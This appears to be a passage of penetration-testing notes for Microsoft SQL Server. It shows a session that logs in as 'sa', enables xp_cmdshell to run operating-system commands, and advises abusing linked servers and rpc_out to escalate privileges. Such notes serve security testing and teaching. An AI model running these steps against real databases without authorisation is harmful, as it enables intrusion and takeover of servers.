Connecting to the Database
sqsh -S 192.168.0.6 -U sa
1> exec sp_configure 'show advanced options', 1 2> go Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install. (return status = 0) 1> reconfigure 2> go 1> exec sp_configure 'xp_cmdshell', 1 2> go Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. (return status = 0) 1> reconfigure 2> go
1> exec master..xp_cmdshell 'whoami' 2> go
The best reference for exploiting server links is SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server!. They're not hard to pull off and can allow you to escalate your permissions quite easily. However, do note that you should absolutely use rpc_out if it's enabled.
Since OpenQuery can only satisfy user queries, stored procedures or user creation is not possible and makes your escalation path much more difficult.